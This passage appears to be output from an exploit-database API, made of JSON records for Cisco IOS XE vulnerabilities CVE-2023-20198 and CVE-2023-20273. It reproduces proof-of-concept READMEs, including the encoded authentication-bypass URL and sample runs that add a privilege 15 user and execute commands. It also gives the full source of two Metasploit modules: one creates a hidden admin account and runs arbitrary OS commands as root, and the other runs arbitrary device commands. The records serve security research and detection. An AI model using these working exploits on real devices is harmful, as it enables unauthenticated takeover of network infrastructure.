It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. 
See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. 
There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-09-01T00:05:24",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated OS Command Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180889",
"href": "https://packetstormsecurity.com/files/180889/Cisco-IOX-XE-Unauthenticated-OS-Command-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Retry \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated OS command execution', \n'Description' => %q{ \nThis module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE \ndevices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges. \n \nThis module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user, \nCVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read \nback via the webserver. Finally the output file is deleted and the admin user is removed. 
\n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => 
[ \n['CVE', '2023-20198'], \n['CVE', '2023-20273'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'], \n# Technical details on CVE-2023-20273. \n['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The OS command to execute.', 'id']), \nOptString.new('CISCO_ADMIN_USERNAME', [false, 'The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.']), \nOptString.new('CISCO_ADMIN_PASSWORD', [false, 'The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.']), \nOptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30]) \n] \n) \nend \n \ndef run \n# If the user has supplied a username/password, we can use these creds to leverage CVE-2023-20273 and execute an OS \n# command. If a username/password have not been supplied, we can leverage CVE-2023-20198 to create a new admin \n# account, and then leverage CVE-2023-20273 to execute an OS command. 
This opens up the ability to leverage the \n# auxiliary module for CVE-2023-20198 to create a new admin account once, then use those new admin creds in this \n# module to execute multiple OS command without the need to create a new 'temporary' admin account for every \n# invocation of this module (which will reduce the noise in the devices logs). \nif !datastore['CISCO_ADMIN_USERNAME'].blank? && !datastore['CISCO_ADMIN_PASSWORD'].blank? \nexececute_os_command(datastore['CISCO_ADMIN_USERNAME'], datastore['CISCO_ADMIN_PASSWORD']) \nelse \nadmin_username = Rex::Text.rand_text_alpha(8) \nadmin_password = Rex::Text.rand_text_alpha(8) \n \nunless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION) \nprint_error('Failed to create admin user') \nreturn \nend \n \nbegin \nvprint_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\") \n \nexececute_os_command(admin_username, admin_password) \nensure \nvprint_status(\"Removing user '#{admin_username}'\") \n \nunless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION) \nprint_warning('Failed to remove user') \nend \nend \nend \nend \n \ndef exececute_os_command(admin_username, admin_password) \nout_file = Rex::Text.rand_text_alpha(8) \n \ncmd = \"$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}\" \n \nunless run_os_command(cmd, admin_username, admin_password) \nprint_error('Failed to run command') \nreturn \nend \n \nbegin \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri('webui', out_file), \n'headers' => { \n'Authorization' => basic_auth(admin_username, admin_password) \n} \n) \n \nunless res&.code == 200 \nprint_error('Failed to get command output') \nreturn \nend \n \nprint_line(res.body) \nensure \nvprint_status(\"Removing output file '/var/www/#{out_file}'\") \n \n# Deleting the output file can take more than one attempt. 
\nsuccess = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do \nif run_os_command(\"rm /var/www/#{out_file}\", admin_username, admin_password) \nnext true \nend \n \nvprint_status('Failed to delete output file, waiting and trying again...') \nfalse \nend \n \nunless success \nprint_error(\"Failed to delete output file '/var/www/#{out_file}\") \nprint_error(out_file) \nend \nend \nend \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180889/cisco_ios_xe_os_exec_cve_2023_20273.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180889"
},
{
"lastseen": "2024-08-31T23:08:51",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated Command Line Interface (CLI) Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180826",
"href": "https://packetstormsecurity.com/files/180826/Cisco-IOX-XE-Unauthenticated-Command-Line-Interface-CLI-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated Command Line Interface (CLI) execution', \n'Description' => %q{ \nThis module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the \nWeb UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15. \n \nYou must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and \n`global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run, \ne.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set \nthe `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set \nthe `MODE` to `global`. 
\n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => 
[ \n['CVE', '2023-20198'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The CLI command to execute.', 'show version']), \nOptString.new('MODE', [ true, \"The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.\", Mode::PRIVILEGED_EXEC]) \n] \n) \nend \n \ndef run \n# We convert escaped newlines into actual newlines, as the Cisco CLI will allow you to navigate from an upper mode \n# (e.g. Global) down to a lower mode (e.g. Privileged or User) via the \"exit\" command. We explicitly let a user \n# specify the mode to execute their CMD in, via the MODE option, however we must still support the user specifying \n# newlines as they may want to execute multiple commands (or manually navigate the difference modes). \ncmd = datastore['CMD'].gsub('\\\\n', \"\\n\") \nif cmd.empty? \nprint_error('Command can not be empty.') \nreturn \nend \n \nmode = Mode.to_mode(datastore['MODE'].to_s.downcase) \nif mode.nil? 
\nprint_error(\"Invalid mode specified, valid values are 'user', 'privileged', or 'global'\") \nreturn \nend \n \nresult = run_cli_command(cmd, mode) \nif result.nil? \nprint_error('Failed to run the command.') \nreturn \nend \n \nprint_line(result) \nend \n \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180826/cisco_ios_xe_cli_exec_cve_2023_20198.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180826"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
}
]
Output with search method:
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. 
See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. 
There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. 
